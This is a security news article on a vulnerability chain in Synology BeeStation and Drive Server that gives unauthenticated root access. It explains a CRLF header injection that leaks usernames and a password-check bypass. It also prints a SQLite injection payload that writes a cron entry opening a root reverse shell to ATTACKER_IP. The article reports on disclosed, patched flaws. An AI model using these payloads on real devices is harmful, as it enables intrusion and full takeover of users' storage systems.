Security researchers chained three vulnerabilities in Synology BeeStation devices to enable unauthenticated attackers to remotely gain root access.
Demonstrated initially at Pwn2Own 2024 by DEVCORE, independent analyst kiddo-pwn published an N-day exploit highlighting a creative SQLite injection method targeting the cron task scheduler.
Vulnerability Chain
The flaws affect BeeStation OS versions before 1.1-65374, DSM versions before 7.2.2-72806-1, and Synology Drive Server versions before 3.5.1-26102.
| CVE | Component | Severity (CVSS 3.1) | Details |
|---|---|---|---|
| CVE-2024-50629 | webapi (DSM/BSM) | Moderate (5.3) | CRLF injection in redirect_url parameter enables limited file read via X-Accel-Redirect. |
| CVE-2024-50630 | Synology Drive Server webapi | Important (7.5) | Improper authentication in syncd daemon bypasses password check using username only. |
| CVE-2024-50631 | Synology Drive Server syncd | Important (7.5) | SQL injection in update_settings command on sharing_link parameters allows write operations. |
Attackers first exploit CVE-2024-50629 in the SYNO.API.Auth.RedirectURI endpoint.
By appending \r\nX-Accel-Redirect:/volume1/@synologydrive/log/cloud-worker.log\r\n to redirect_url, they leak usernames from initialization logs.
Root RCE Technique
CVE-2024-50630 requires a valid username. Omitting the password in syncd requests via webapi forces fallback to domain socket authentication, which trusts local origin and skips password validation.
Post-auth, CVE-2024-50631 targets SQLite queries in the binary protocol on TCP port 6690.
Unescaped inputs like sharing_link_customization enable breakout: “; ATTACH DATABASE ‘/etc/cron.d/pwn.task’ AS cron; CREATE TABLE cron. Tab (dataz text); INSERT INTO cron.tab (dataz) VALUES (‘\n* * * * * root bash -i >& /dev/tcp/ATTACKER_IP/PORT 0>&1\n’); –.
This “dirty file write” creates a SQLite database disguised as crontab.
Cron treats binary headers as malformed lines because newlines isolate the valid entry, allowing a root reverse shell to be executed within a minute.
Synology patched these in advisories SA-24:20 and SA-24:21. Update immediately and monitor logs. A full PoC exists on GitHub.
Credits go to DEVCORE’s Pumpkin Chang and Orange Tsai for discovery, with kiddo-pwn advancing the cron technique.
